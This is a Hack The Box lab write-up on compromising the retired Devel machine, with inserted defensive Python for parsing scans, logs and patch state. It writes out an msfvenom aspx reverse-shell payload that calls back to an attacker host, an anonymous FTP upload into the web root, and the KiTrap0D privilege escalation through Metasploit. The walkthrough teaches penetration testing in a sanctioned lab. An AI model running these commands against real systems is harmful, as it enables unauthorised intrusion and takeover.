Keep Calm and Hack The Box - Devel

Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them simulate real-world scenarios and some of them lean more towards a CTF style of challenge.

Note. Only write-ups of retired HTB machines are allowed.

Devel is described as a relatively simple box that demonstrates the security risks associated with some default program configurations. It is a beginner-level machine which can be completed using publicly available exploits.

We will use the following tools to pwn the box from a Kali Linux machine

Step 1 - Scanning the network

The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.

This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on that phase to get as much information as possible.

I will use Nmap (Network Mapper), which is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.

I use the following command to get a basic idea of what we are scanning

nmap -sV -O -F --version-light 10.10.10.5

-sV: Probe open ports to determine service/version info

-O: Enable OS detection

-F: Fast mode - Scan fewer ports than the default scan

--version-light: Limit to most likely probes (intensity 2)

10.10.10.5: IP address of the Devel box

You can also use Zenmap, which is the official Nmap Security Scanner GUI. It is a multi-platform, free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users.

I use a different set of options to perform an intensive scan

nmap -A -v 10.10.10.5

-A: Enable OS detection, version detection, script scanning, and traceroute

-v: Increase verbosity level

10.10.10.5: IP address of the Devel box

If you find the results a little bit too overwhelming, you can move to the Ports/Hosts tab to only get the open ports.

We can see that there are 2 open ports:

Port 21. File Transfer Protocol (FTP) control (command). Here it's a Microsoft FTP

Port 80. Hypertext Transfer Protocol (HTTP). Here it's an IIS server

The most likely initial attack vector appears to be the FTP in this case
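The scan above reports the same two services in nmap's normal output format. As an added example that is not part of the original write-up, here is a small Python parser that turns that output into structured findings: it pulls out the open ports, service versions and NSE script results, then flags the combination the write-up goes on to use, an FTP service that allows anonymous login and whose directory listing already contains IIS web files, next to an HTTP service on the same host. The sample scan output is constructed to mirror what `nmap -A` reports for this box; the port and script line formats are nmap's own, while the assessment rules are mine.

```python
import os
import re

# Constructed sample in nmap's normal output format, modelled on what
# `nmap -A 10.10.10.5` reports for this box (Microsoft FTP + IIS 7.5).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.5
Host is up (0.040s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
# "21/tcp open  ftp     Microsoft ftpd"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# NSE header lines look like "| name: text" or "|_name: text"; continuation
# lines ("| 03-18-17 ...", "|_  SYST: ...") carry no name or extra indentation.
SCRIPT_RE = re.compile(r"^\|(?:_| )([\w-]+):\s*(.*)$")

# File extensions that only make sense inside an IIS web root.
WEB_EXTENSIONS = {".htm", ".html", ".asp", ".aspx", ".ashx", ".asmx"}


def parse_nmap(text):
    """Parse normal nmap output into {'host': ip, 'ports': [port dicts]}."""
    report = {"host": None, "ports": []}
    port = None      # port dict currently being filled
    script = None    # name of the NSE script whose output we are inside
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            report["host"] = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m:
            port = {"port": int(m.group(1)), "proto": m.group(2),
                    "state": m.group(3), "service": m.group(4),
                    "version": m.group(5).strip(), "scripts": {}}
            report["ports"].append(port)
            script = None
            continue
        if port is None or not line.startswith("|"):
            continue
        m = SCRIPT_RE.match(line)
        if m:
            script = m.group(1)
            port["scripts"][script] = [m.group(2)] if m.group(2) else []
        elif script is not None:
            port["scripts"][script].append(line.lstrip("|_ ").rstrip())
    return report


def assess(report):
    """Turn scan facts into (severity, message) findings a defender would raise."""
    findings = []
    open_ports = {p["port"]: p for p in report["ports"] if p["state"] == "open"}
    ftp = open_ports.get(21)
    if ftp is None:
        return findings
    anon = ftp["scripts"].get("ftp-anon", [])
    if not anon or not anon[0].startswith("Anonymous FTP login allowed"):
        return findings
    findings.append(("HIGH", "anonymous FTP login allowed on %s:21" % report["host"]))
    # ftp-anon prints a directory listing after its verdict; the file name is
    # the last whitespace-separated token of each entry.
    names = [entry.split()[-1] for entry in anon[1:] if entry.strip()]
    web_files = [n for n in names if os.path.splitext(n)[1].lower() in WEB_EXTENSIONS]
    if web_files and (80 in open_ports or 443 in open_ports):
        findings.append(("HIGH",
                         "FTP listing contains web content (%s) and a web server is "
                         "listening: check whether the FTP root is the web root and "
                         "whether anonymous users can write to it" % ", ".join(web_files)))
    return findings


if __name__ == "__main__":
    for severity, message in assess(parse_nmap(SAMPLE_NMAP_OUTPUT)):
        print(severity, message)
```

Running it against the constructed sample yields two HIGH findings; the second is exactly the hypothesis the next step of the write-up confirms by hand (the FTP root is the IIS web root and anonymous users can write to it). Feeding it real `nmap -oN` output from your own scans works the same way, since the parser keys off nmap's port and script line formats rather than this particular host.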

Step 2 - The vulnerable FTP

We open Firefox and visit the website at http://10.10.10.5

From the reconnaissance phase, we found 2 files under the Microsoft FTP. Let's see if we can access them from the browser.

I can access the welcome.png image file by visiting

http://10.10.10.5/welcome.png

I can also access the iisstart.htm page

http://10.10.10.5/iisstart.htm

We now know two things:

  • The FTP is used as a file directory for the web server - discovered when we accessed the files from the recon phase.
  • The FTP allows anonymous login - discovered when we performed the intense scan.

Let's see if we can create a file and add it to the FTP

I create a file by using this command and output the result to a file called htb.html

echo HackTheBox > htb.html

I then check with ls if the file has been created, and look at the content of the file with this command

cat htb.html

Let's now connect to the FTP to add our test file

To connect to the FTP, I use this command

ftp 10.10.10.5

I type anonymous as the username and just press enter for the password, as it allows anonymous login.

I am now connected to the FTP.

I add the file on the FTP with this command

put htb.html

The file has been successfully sent over. Let's check if we can access it from Firefox. I visit the page and we can see the output HackTheBox on the web page.

http://10.10.10.5/htb.html

Now that we know we can send over files, let's craft an exploit!
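The weakness this step exposes is an anonymous FTP write landing in the IIS web root, which is also something a defender can see in the server's own logs: a STOR from an unauthenticated session followed by an HTTP request for the same file. As an added example, not part of the original write-up, the Python below parses IIS W3C-format FTP and web logs and correlates completed anonymous uploads with later successful requests, escalating to CRITICAL when the uploaded file has an extension IIS hands to a script engine. The log lines are constructed to mirror this write-up's sequence (htb.html, then devel.aspx, each fetched afterwards from 10.10.14.15); the parser reads the field order from the `#Fields:` header rather than assuming one IIS layout, and the treatment of `anonymous`/`-` as unauthenticated is an assumption noted in the code.

```python
import os
import posixpath
from datetime import datetime

# Constructed sample logs in IIS W3C format, mirroring the steps in this
# write-up: an anonymous FTP session uploads htb.html and then devel.aspx,
# and both files are later requested over HTTP. Field order is taken from
# the #Fields header, so the parser does not depend on any one IIS layout.
FTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status
2017-03-17 17:40:01 10.10.14.15 anonymous 10.10.10.5 21 USER anonymous 331 0
2017-03-17 17:40:03 10.10.14.15 anonymous 10.10.10.5 21 PASS *** 230 0
2017-03-17 17:40:10 10.10.14.15 anonymous 10.10.10.5 21 STOR htb.html 226 0
2017-03-17 17:45:22 10.10.14.15 anonymous 10.10.10.5 21 STOR devel.aspx 226 0
"""

WEB_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2017-03-17 17:40:30 10.10.10.5 GET /htb.html - 80 - 10.10.14.15 Mozilla/5.0 200 0 0 3
2017-03-17 17:46:05 10.10.10.5 GET /devel.aspx - 80 - 10.10.14.15 Mozilla/5.0 200 0 0 812
"""

# Extensions IIS hands to a script engine, i.e. an upload that becomes code.
SERVER_SIDE_EXECUTABLE = {".asp", ".aspx", ".ashx", ".asmx", ".asax", ".svc"}
# Account names that mean "no credential was presented" (assumption: IIS FTP
# logs the anonymous account as "anonymous"; some deployments log "-").
ANONYMOUS_NAMES = {"anonymous", "ftp", "-"}


def parse_w3c(text):
    """Parse W3C extended log lines into dicts keyed by the #Fields names."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip() or fields is None:
            continue
        else:
            values = line.split()   # IIS writes '+' for spaces inside a field
            if len(values) == len(fields):
                rows.append(dict(zip(fields, values)))
    return rows


def timestamp(row):
    return datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")


def correlate_uploads(ftp_rows, web_rows):
    """Pair completed anonymous FTP uploads with later 200 responses for the same file."""
    alerts = []
    for up in ftp_rows:
        # STOR with a 2xx reply is a completed upload
        if up["cs-method"] != "STOR" or not up["sc-status"].startswith("2"):
            continue
        if up["cs-username"].lower() not in ANONYMOUS_NAMES:
            continue   # authenticated uploads are reviewed separately
        name = posixpath.basename(up["cs-uri-stem"])
        executable = os.path.splitext(name)[1].lower() in SERVER_SIDE_EXECUTABLE
        served = [w for w in web_rows
                  if posixpath.basename(w["cs-uri-stem"]) == name
                  and w["sc-status"] == "200" and timestamp(w) >= timestamp(up)]
        if executable:
            severity = "CRITICAL" if served else "HIGH"
        else:
            severity = "MEDIUM" if served else "LOW"
        alerts.append({
            "severity": severity, "file": name, "client": up["c-ip"],
            "uploaded": up["date"] + " " + up["time"],
            "served": bool(served),
            "first_request": served[0]["time"] if served else None,
        })
    return alerts


if __name__ == "__main__":
    for alert in correlate_uploads(parse_w3c(FTP_LOG), parse_w3c(WEB_LOG)):
        print(alert)
```

On the sample, htb.html produces a MEDIUM alert (anonymous write confirmed to land in the web root) and devel.aspx a CRITICAL one (server-side script uploaded anonymously and then executed). The severity split is deliberate: the MEDIUM case is the early warning that the FTP root and web root overlap, which is the misconfiguration to fix before any .aspx ever arrives.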

Step 3 - Using MSFvenom to craft an exploit

We will use MSFvenom, which is a payload generator. You can learn more about it here

But first, let's check in the Metasploit Framework which payload we will need to craft our exploit.

We know that we need to create a reverse shell, which is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, and through that connection code or command execution is achieved.

The reverse TCP shell should be for Windows and we will use Meterpreter.

From the Offensive Security website, we get this definition for Meterpreter

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

You can read more about Meterpreter here.

I launch Metasploit and search for reverse TCP payloads. I use the following command

search windows/meterpreter/reverse_tcp

We find an interesting payload, number 2, which is a Reverse TCP Stager. This payload injects the meterpreter server DLL via the Reflective DLL Injection payload and connects back to the attacker

payload/windows/meterpreter/reverse_tcp

Now let's go back to msfvenom to craft our exploit, and more specifically an aspx reverse shell. This piece of information was collected during the recon phase

I use the following command

msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o devel.aspx LHOST=10.10.14.15 LPORT=4444

-p: Payload to use

-f: Output format

-o: Save the payload to a file

LHOST: Local host

LPORT: Local port

I then check with ls if the file has been created. It's time to send it over to the FTP

Let's reconnect to the FTP and send our little gift!

I connect to the FTP, enter anonymous as the username, and skip the password by pressing enter. I then send the file with the following command

put devel.aspx

Let's check if the file has been correctly sent over. Going back to Firefox, I navigate to the FTP server with the following URL

ftp://10.10.10.5

We can see that our little gift is here!

Here is the exploit, if you're curious to know what it looks like

Step 4 - Setting up a listener with Metasploit

Back on Metasploit, I use the following command to set the payload handler

use exploit/multi/handler

I check to see which options are available

We first set up the payload

set payload windows/meterpreter/reverse_tcp

Then the LHOST

set lhost 10.10.14.15

And finally the LPORT

set lport 4444

If we check the options now, we should see that everything is set up

Let's run the exploit.

After this message appears

Started reverse TCP handler on 10.10.14.15:4444

go back to the browser and access the page where the malicious script is hosted

http://10.10.10.5/devel.aspx

You should then see a Meterpreter session created

Now that I have a session, I try to look for the first flag, user.txt, using the following command in Meterpreter

search -f user.txt

No files are matching my search. I try with .* to see other files, but nothing useful

I then create a shell with the following command

shell

I use the following command to get the system information

systeminfo

We can see that the registered owner is called babis. This might be an important piece of information when we look for the user flag. We can also see that the machine doesn't have any hotfixes.

I start navigating through the folders. I use dir to list all files/folders and cd to change directory. I try my luck on the babis and Administrator folders, but both gave me Access denied.

We need to escalate privilege! Knowing that when we checked for the system information, no hotfixes were found, we can try to find exploits applicable to this machine.
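The two facts read off systeminfo here, no hotfixes installed and (as Step 5 notes) a 32-bit build, are exactly what decide whether the kernel exploit used later applies, and they are just as useful to the administrator auditing the box. As an added example, not from the original write-up, the Python below parses systeminfo output into the registered owner, architecture, build number and hotfix list, and turns them into patch-state findings. It goes a little beyond the page by also handling output that does list hotfixes. Both sample outputs are constructed: the owner, architecture and "N/A" hotfix line match what the write-up observes, while the OS version strings and the KB numbers are sample values. The rule tying KB977165 to bulletin MS10-015 (the KiTrap0D fix) is mine.

```python
import re

# Constructed systeminfo output modelled on what the write-up observes on this
# box: registered owner babis, 32-bit Windows 7, no hotfixes. The OS version
# and build number are sample values, not taken from the page.
SYSTEMINFO_UNPATCHED = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
Registered Owner:          babis
System Type:               X86-based PC
Total Physical Memory:     1,023 MB
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
"""

# A second constructed sample with a hotfix list, to exercise the other branch.
SYSTEMINFO_PATCHED = """\
Host Name:                 WS01
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7601 Service Pack 1 Build 7601
Registered Owner:          admin
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB976902
                           [02]: KB977165
                           [03]: KB2999226
"""

# "Key:   value" lines start in column 0; indented "[01]: ..." lines continue
# the previous key, and only the ones under Hotfix(s) carry KB identifiers.
KEY_VALUE_RE = re.compile(r"^([A-Za-z][A-Za-z0-9 ()/-]*?):\s+(.*)$")
HOTFIX_ENTRY_RE = re.compile(r"^\s+\[\d+\]:\s*(KB\d+)")
# KB977165 is the update shipped with bulletin MS10-015 (KiTrap0D).
MS10_015_KB = "KB977165"


def parse_systeminfo(text):
    """Return a dict of systeminfo keys plus a 'hotfixes' list of KB numbers."""
    info = {"hotfixes": []}
    in_hotfix_block = False
    for line in text.splitlines():
        m = HOTFIX_ENTRY_RE.match(line)
        if in_hotfix_block and m:
            info["hotfixes"].append(m.group(1))
            continue
        m = KEY_VALUE_RE.match(line)
        if m:
            key, value = m.group(1).strip(), m.group(2).strip()
            info[key] = value
            in_hotfix_block = key == "Hotfix(s)"
    return info


def assess_patch_state(info):
    """Derive owner, architecture, build and patch findings from parsed systeminfo."""
    system_type = info.get("System Type", "").lower()
    arch = "x86" if "x86" in system_type else "x64" if "x64" in system_type else "unknown"
    m = re.search(r"Build (\d+)", info.get("OS Version", ""))
    result = {
        "owner": info.get("Registered Owner"),
        "arch": arch,
        "build": int(m.group(1)) if m else None,
        "hotfix_count": len(info["hotfixes"]),
        "findings": [],
    }
    if not info["hotfixes"]:
        result["findings"].append("no hotfixes installed: assume every public local "
                                  "privilege escalation for this build applies")
    if arch == "x86" and MS10_015_KB not in info["hotfixes"]:
        result["findings"].append("32-bit Windows without %s: MS10-015 (KiTrap0D) fix "
                                  "not present" % MS10_015_KB)
    return result


if __name__ == "__main__":
    for sample in (SYSTEMINFO_UNPATCHED, SYSTEMINFO_PATCHED):
        print(assess_patch_state(parse_systeminfo(sample)))
```

For the first sample the result carries owner `babis`, arch `x86`, build 7600 and two findings; for the second the hotfix list is populated, the architecture is x64 and no finding is raised. The same parser works on the output of `systeminfo` saved from any Windows host, which makes it a quick way to triage a fleet for machines that have never received an update.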

Step 5 - Performing Privilege Escalation

I put the session in the background with this command

background

I then use the following command

use post/multi/recon/local_exploit_suggester

This module suggests local Meterpreter exploits that can be used. The exploits are suggested based on the architecture and platform on which the user has a shell opened, as well as the available exploits in Meterpreter

I check the options and I set the session

It's important to note that not all local exploits will be fired. Exploits are chosen based on these conditions: session type, platform, architecture, and required default options

Going down the list

exploit/windows/local/bypassuac_eventvwr

fails due to the IIS user not being a part of the administrators group, which is the default and to be expected.

I use the next exploit on the list, which is

use exploit/windows/local/ms10_015_kitrap0d

This module will create a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy. If the session in use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows.

When we ran sysinfo in the Meterpreter session, it revealed that the target was x86 architecture

I check the options and then set the session

I run the exploit.

The exploit was successful, but the session couldn't be created. This is because the first line of the exploit output shows the reverse handler being set up on the default eth0 interface and default port, and not on the VPN interface for the HTB labs.

Started reverse TCP handler on 10.0.2.15:4444

I check the options and set LHOST and LPORT

I then check all the sessions alive with the following command, in case my session died

sessions -l

I can see my session

Now that we have a meterpreter session, let's start navigating the folders and find the flags!

Step 6 - Looking for the user.txt flag

Let's first check where we are with the following command

pwd

which stands for print working directory

I go up to C:\ and ls all the files/folders. I already know where to look from my previous attempt in Step 4 - Setting up a listener with Metasploit

I go back to the Users directory

Then move to the babis directory

From there, I go to the Desktop directory

We found the user.txt.txt file! To read the content of the file I use the command

cat user.txt.txt

Now that we have the user flag, let's find the root flag!

Step 7 - Looking for the root.txt flag

Going back to C:\, I navigate to the Administrator folder, then the Desktop folder. I use ls to list all files under the Desktop folder

We find the root.txt.txt file!

To read the content of the file I use the command

cat root.txt.txt

Congrats! You found both flags!



Please don't hesitate to comment, ask questions or share with your friends :)

You can see more of my articles here

You can follow me on Twitter or on LinkedIn

And don't forget to #GetSecure, #BeSecure & #StaySecure!

Other Hack The Box articles

Translated from: https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-devel/
